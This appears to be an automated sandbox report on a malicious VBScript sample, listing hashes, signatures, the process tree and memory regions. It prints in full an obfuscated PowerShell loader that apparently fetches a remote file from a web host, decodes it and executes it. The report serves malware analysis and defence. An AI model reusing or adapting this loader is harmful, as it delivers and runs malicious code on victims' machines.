Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    15/02/2024, 05:40

General

  • Target

    d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c.vbs

  • Size

    93KB

  • MD5

    79094e9847a7bf1ffd13972fd7f4fe9f

  • SHA1

    98d0d34a146712d3399fcacf2369e11c4cd9c4ea

  • SHA256

    d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c

  • SHA512

    e0399f4fe05cdbc25dc193142d017d1161adb049cfd82dce26c03054f52825c43964b30c6c189cc293c85fb5f6da1092e62cfc736072294be62c23463a8386a9

  • SSDEEP

    1536:HJglU0P4wDaWxyADV76w2bnQReOlDaP5QrIWG2CSAe0i4rEOz+d:pglnvD1xyAp761kRe8DaP54G3eL4rvyd

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#bawsuntti Preterien Dkfjernon Slavehandl #>;$Ellagate=(cmd /c set /A 115^^0);Function Cyklis197 ([String]$Fakkelto){$Ellagate=[char][int]$Ellagate;$Udvidelser=$Ellagate+'ubstring';$Darghinho=8;$disbrainw=Elipser4($Fakkelto);For($Betjenbly=7; $Betjenbly -lt $disbrainw; $Betjenbly+=$Darghinho){$Blabb=$Fakkelto.$Udvidelser.Invoke($Betjenbly, 1);$Elipser=$Elipser+$Blabb;}$Elipser;}function Sikkerh ($Milj93){& ($Elipser01) ($Milj93);}function Elipser4 ([String]$Gosp){$ocaadrena1=$Gosp.Length-1;$ocaadrena1;}$Elipser02=Cyklis197 'HeptadeT KrybenrAbhorsoaIlluminn AntistsSkvtsglfMentioneTilskynr benfrirTjaldsbi PerukenSleevedgDansemu ';$Packt=Cyklis197 'Ddemandhtremolot SuprastRectangpmellemgsOvertag:Parader/ Flacke/ScaphogsLkkestrcOverheaaFrsemasiSprinklntilslutsLindbereOvertimt BotchioForttni.WeakytrcConcento SubsammMorallr.IbrugtabSkonnerrEbdomad/TilbagewManatinpRensnin-Ekspatra mennesdDesultomBorolibiKusamren Monome/ NashaacChromatyUndecoycHanefjelDelirioosolfangtDvrgkonh NeglecuCospons.FluidicpDansantfNarratemBilleda ';$Elipser01=Cyklis197 'Beredeli LeasineRepressxHandlin ';$Elipser00=Cyklis197 'Neathmo$LactonigKonfisklPolyestoAnmeldebInterioahovedstl Folkso:PengepooFaseindcBecausea FuzegeaIntrodud mezcalrFerskvae KameranEmbryopaForuren8Smuglma Endoper=Hexagyn HildegaSBldtvant AptalvaFedepserNoncoagtIsaianw-afformaBCryoplaiTilbjelt DispossBrdfabrT Holopar GrasseaHeartbrn LuteolsQuitchefNitrateeNegerborhilltop Finansb-VarigheSnedrakkoKologituShoplifrSphyrnicStvkonse Sllern Ecchbla$ BortpeP OzzieoaUndersecStenogakAfrasiatBoldfac Genspej-ElelfenDBrinishePropagasRivetndtkaffirsiElectranCalceusaCupelertcorbicui AlricgoFredskonKnaveri Pretes$OptjeneoTsubokoc Fastbaa JerntnaCardiecdUlykkesrRedialleSomitalnEmbatheaBegaudc2Aproned ';Sikkerh (Cyklis197 'autodkk$Autorisg herrerlNonopproPostnumb Cordiaa HentehlFilialn:NonprotoOvervrecFortyskaAmphithaSpeditidHormonorTetraloe 
CharcinRugegspadilatom2jugland=Scleren$GluedbaeGeneralnExpellevBrystsv:ElytrinaStenkulp Dupperp ConfirdAfledniaDiamondt samalqaInstruk ') ;Sikkerh (Cyklis197 'GeneralISkraldsmmillionpVsentlioWafthyprBandagetKulturc- HvisaaMOmbetrkoSlidtsodVrksteduStrandklheltalseLittera EsthacyBRenegotiModerkat plenums SpartlTkogechorUlvebloa AcinetnTakahessLeverinfVomitore GasterrJohnydo ') ;$ocaadrena2=$ocaadrena2+'\Taksati.kon' ;Sikkerh (Cyklis197 ' Comedy$DriftskgMedarbelPaabegyo LagerabUnscornaRadiiunl Pedant:Denimmeo SammencKlanglsaWhistlea HvidvidEksplosrVidaabne NonnatnetologiaJetesbe7 clappe=Agtsomm(RottefnTurostifeUbestvesWavelestHaandkl-SupermoP TestfiaBhmernetForhaanhPromode Svinghj$ GodmotoAcetomecErhverva TenebraAvissaldSindsstrOdorleseEikefifnTekstkraLsersmu2Ecandac)Pandehu ') ;while (-not $ocaadrena7) {Sikkerh (Cyklis197 ' GringeIFarvehafAristok Shampon(Salting$congessoDepravecDerommeaIndpakkaConubiudInsultpr SociomeVanskbnnUndergiaMontmor8 admira.VandprvJBygningoCatkinabStrykniSParsonotBrachygaKongerntBrunerieGatekee Manpack-KhevzureUnmuddlq Tauten Sidelin$UngorgeEAtionsplWoolliniVerdensp Clystes StartbeSpaniperSkraapa0 Smashe2Kartote)Oozoali Oblataa{ NvnermS RygepatFjernstaForhandrBookbintResumee-TantaraSResterelBlazereeLiturgieVrdimngpToxalbu Overtop1Blandin}Outparae UnderflHovednrspiggybae Rivalr{SigteevSTotemittSterlinaTsenesmrPatchwotStatefu- TypeabSTranslalStrattoeTidsskreForsikrpNivella Perspir1 Wacksy; DisjasSTabelopiMutinyskCognizekSlutbete SkrmharLuftbaah Nogged Broerun$VekselvEHarebotlPjokkedi MelanepBortledsMasticie FlokinrOpkobli0Fdevare0Paltril}Osophon ');Sikkerh (Cyklis197 'Yokcliq$OutswingOrwellslPhlogisoMantappb positiaVgrerthlAccosts:NonodoroTiredomcbrugtbaaTilbjelaUnsatisdsystemirPegasuse DivisinBenchwoaAdminis7Keglere=Blindga(BiotechTFlgestneOplsendsPretraitTumbleh-ShipmanP Cephala NetadrtMetacenhbrnesen Arkite$ExplanaoNotatiocSemificaCervicoa clintidOtiliefrScrollbe LuftfanGasovnea Python2Zephani)Anslags ') ;}Sikkerh (Cyklis197 
'Winnowe$KrftenlgForklarlJuanitaoTransanbRudimenaNormskolEkstrak:DeodoriNBellwineDelatindBilledsj Saviou1Stereot7Folketi4Bajonet Forveks=Diamond UmisforG havegae Autoset Frugtk-PustuleCCrissumoAltercan AftrkktSexageseBrandlonSyrligstGuidebo Trolse$Technolo CiselecScanninaKursnedaFaqlowedInevitarKursvrdeUnbandanagribusaTirrede2Skriben ');Sikkerh (Cyklis197 'Transce$SensommgEngrosblKnibtano BlgedabUnexhumaDekoratlUundvig:ScranneD FordrveSnowshoa LandflcPadesoyoIndubitnXylinde Rundesa=Frdiggr Wellcur[ touchlSMjesuniyTankesys IhjelptFangstbenskeformHairspr.PrinterCFnikerno RevisonViolentvCoefficeHalvlegr Friscot Enneas]Ripplet:Ensilag:MetrikkFProbattrBlaffero serailm YoghurBMattereaKnledsmsPishhoveAdvisor6studhor4 FalsumSOmhyggetUnshipsrVidvinkiStramtsn myoprogNdvrget( Grinag$ PreabuNMiskmaseBlystbeddiurnuljShamans1Pottosf7Apanage4Berteli)Villale ');Sikkerh (Cyklis197 ' Levuli$VaricocgUnisonalUnexpecoGutsybub PantalaStringclCobbies:InconelEcomputelKilocaliCradlerpdormitosForespeeSwissesrAchines2Indavle Preserv=Toxinea Devalue[DecapetSYmtertryProfounsIndkrvnt BruttoeTilspurmPathbre.SubantiT emboweeOtteaarxCentraltDepende.FarvemsEFallernnAgertidcObtempeoBurielsdDramatiiTodagesnManipulg Riglin]Anhnger:Sorings:afledteA FootraSTrallevCHessparIEmbarquISirupyk.OclocktG Vemodoe PuffedtPhonetiSSplotchtGevirscrDoctrini JohnsenGennemsgSubvers(Gavflab$SektionDGrammateTriboloaSnurpencExpireuoManiocan Proful)Cathept ');Sikkerh (Cyklis197 'ophnges$BogtrykgdunlinblEbonizeoSuccessbResonera Fejltil kuankl: JannsgE PumperlStrepsii SomedepRhythmisAmphigoe PartiorHjertes3Demokra=Skoalin$ReemigrEStewardlFisedesigulnarepProduktsQuadpleeSekunderSovietc2 produk.EurekafsSnippetuReprsenbDermatosAdelsmatAtomknurSammenbiVittussnMurstengDiffusi(skeyhel3 Fordyb0Mercypr9Prosely8Geograf8Abcerne6Begynde,Unallit2 Niases4Beatusp1Udmaler6Exorciz0Quiresh)Asylans ');Sikkerh $Elipser3;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:2356

Network

Downloads

          • memory/2156-4-0x000000001B390000-0x000000001B672000-memory.dmp

            Filesize

            2.9MB

          • memory/2156-5-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

            Filesize

            9.6MB

          • memory/2156-7-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-6-0x0000000002110000-0x0000000002118000-memory.dmp

            Filesize

            32KB

          • memory/2156-8-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

            Filesize

            9.6MB

          • memory/2156-9-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-10-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-11-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-12-0x00000000027F0000-0x0000000002812000-memory.dmp

            Filesize

            136KB

          • memory/2156-13-0x0000000002540000-0x0000000002552000-memory.dmp

            Filesize

            72KB

          • memory/2156-14-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

            Filesize

            9.6MB

          • memory/2156-15-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-16-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

            Filesize

            9.6MB

          • memory/2156-17-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-18-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-19-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB